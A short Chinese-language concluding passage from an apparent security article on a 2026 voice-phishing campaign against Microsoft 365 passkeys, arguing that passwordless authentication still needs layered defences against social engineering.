2026 年 Pink 团伙发起的 Microsoft 365 通行密钥语音钓鱼攻击,是无密码身份安全体系面临社会工程学威胁的典型标志性事件。本次攻击打破行业对 FIDO2 通行密钥 “绝对抗钓鱼” 的认知误区,清晰证明云身份安全防护是覆盖接口、网络、通信、终端、人员的系统性工程。本文梳理的攻击机理、代码示例、闭环防御方案可为国内各类使用 Microsoft 365 云办公平台的企业提供落地参考,帮助政企机构提前应对同类新型语音钓鱼威胁,保障企业云存储、邮件、协同办公核心数据安全。安全运营团队需持续跟踪全球同类攻击态势,动态调整身份访问策略,平衡无密码认证便捷性与企业数据安全底线。

编辑:芦笛(公共互联网反网络钓鱼工作组)